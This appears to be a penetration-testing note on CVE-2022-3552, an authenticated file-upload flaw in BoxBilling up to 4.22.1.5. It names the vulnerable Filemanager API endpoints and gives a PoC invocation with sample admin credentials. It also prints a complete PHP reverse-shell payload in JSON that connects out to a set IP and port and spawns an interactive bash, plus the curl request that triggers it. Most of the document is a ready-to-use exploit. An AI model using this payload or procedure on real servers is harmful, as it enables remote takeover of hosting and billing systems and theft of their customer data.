BoxBilling

BoxBilling is an open-source web application designed to facilitate automated client management, billing, and support services. Although primarily aimed at web hosting companies, it functions similarly to a lightweight CMS by offering modules for account handling, invoicing, and service provisioning through a web interface. The platform is PHP-based, supports integration with various payment gateways, and exposes multiple web-accessible endpoints, some of which interact directly with backend logic and server resources.

Authenticated File Upload (RCE)

BoxBilling versions up to and including 4.22.1.5 that allows authenticated administrators to upload files without proper validation, including dangerous file types like PHP shells. The flaw resides in a hidden API endpoint that fails to restrict file type or enforce adequate sanitization . Once a payload is uploaded, execution occurs on the server side, resulting in RCE with web‑server privileges. A working is available (needs changing the hardcoded socket details in the revshell payload).

BoxBilling versions up to and including 4.22.1.5 are affected by an authenticated file upload vulnerability (CVE-2022-3552) that allows administrative users to upload arbitrary files without any validation or restriction on file type. The vulnerability exists within the Filemanager API, which fails to enforce input sanitization or MIME filtering when writing data to disk. This flaw allows for the upload of malicious PHP payloads, resulting in RCE when the uploaded file is accessed via the web server.

A public PoC is available and works with minimal modification. Socket values (IP and port) must be updated within the reverse shell payload prior to use:

./CVE-2022-3552.py -d http://boxbilling.com -u admin@boxbilling.com -p Passw0rd123!

The vulnerability can also be exploited manually via a POST request to the endpoint:

/index.php?_url=/api/admin/Filemanager/save_file

The data parameter accepts raw PHP content as a string and writes it to a file in the web root. No restrictions are enforced, making it possible to directly implant a web/reverse shell. All double quotes within the payload must be escaped (\"), and unnecessary whitespace should be removed to ensure proper parsing. To confirm the upload path, the following endpoint can be queried (BoxBilling Admin API Docs):

/index.php?_url=/api/admin/Filemanager/get_list

Example payload (reverse shell), delivered via the API as JSON:

{
  "order_id": 1,
  "data": "<?php set_time_limit (0);$VERSION = \"1.0\";$ip = '192.168.45.170';$port = 80;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/bash -i';$daemon = 0;$debug = 0;if (function_exists('pcntl_fork')) {$pid = pcntl_fork();if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {exit(1);}$daemon = 1;}chdir(\"/\");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {exit(1);}$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"),2 => array(\"pipe\", \"w\"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);while (1) {if (feof($sock)) {break;}if (feof($pipes[1])) {break;}$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process); ?>",
  "path": "revshell.php"
}

Once successfully uploaded, the shell becomes accessible via a browser or CLI:

curl -s http://boxbilling.com/revshell.php